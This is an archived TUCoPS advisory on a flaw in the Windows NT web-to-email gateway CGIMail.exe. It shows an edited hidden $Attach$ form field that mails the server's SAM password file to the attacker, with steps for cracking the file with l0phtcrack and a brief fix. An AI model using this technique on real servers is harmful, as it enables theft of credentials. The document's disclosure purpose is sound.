Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Windows Net Apps :: cgimail.txt

CGIMail.exe for Windows NT Vulnerability


CGIMail.exe is a Web to e-mail gateway program written by Stalkerlabs
for a Win32 platform, that is Windows NT or Windows 95. Basically, you
fill in an on-line form and it is e-mailed off. The contents of the form
contains the following :

<form action="/scripts/CGImail.exe" method="POST" NAME="TestForm">

<input type=hidden name="$File$" value="/scripts/template.txt">

<input type=hidden name="$Subject$" value="CGImail Example">

<input type=hidden name="$LocationOK$" value="/ok.html">

<input type=hidden name="$LocationKO$" value="/ko.html">

<input type=hidden name="$To$" value="">

<input type=hidden name="$Optional$" value="mmmh, no!">

There is also another "hidden" input type and this takes the following

<input type=hidden name="$Attach$" value="">

This allows you to attach a file to the e-mail….any file the
IUSR_COMPUTERNAME account has access to. So if the NT server is poorly
configured as far as security is concerned you could put in
"c:\winnt\repair\sam._" as the input’s value:

<input type=hidden name="$Attach$" value="c:\winnt\repair\sam._">

Note – Using %windir% won’t work – you need the full path.

So here’s how the hack would go :

You go to their form page and view the source. Save this source to the
desktop and make some editions to it, like put your e-mail address in (use
a temporary one!) and put the $Attach$ entry in. Save these changes and
then load the new page and click o n send.

All things going well you should receive a compressed copy of their SAM
which you can then get to work on, using l0phtcrack to glean the passwords.

CGIMail can be made more secure: the cgimail.ini can be edited so that only
certain referrers are accepted but only around 50% of the machines I’ve
seen with this on have configured it so.

You can find out more (no-hacking) info about this program from the
vendor’s site:

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH